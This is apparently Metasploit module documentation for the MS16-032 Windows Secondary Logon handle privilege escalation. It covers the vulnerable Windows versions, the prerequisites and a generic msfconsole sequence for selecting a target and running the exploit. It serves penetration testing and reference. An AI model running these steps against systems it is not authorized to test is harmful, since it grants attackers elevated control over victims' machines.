- The PoC for MS16-032 was taken from Exploit-DB
- The exploit binary (ms16-032.exe) was from @khr0x40sh
Vulnerability reference:
- Windows x86
- Windows x64
This module exploits the lack of sanitization of standard handles in the Windows Secondary Logon Service. The vulnerability is known to affect Windows 7 through 10 and Windows Server 2008 through 2012, both 32-bit and 64-bit. The module only works against those Windows versions when PowerShell 2.0 or later is present and the system has two or more CPU cores.
```
msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
...targets...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
...show and set options...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit
```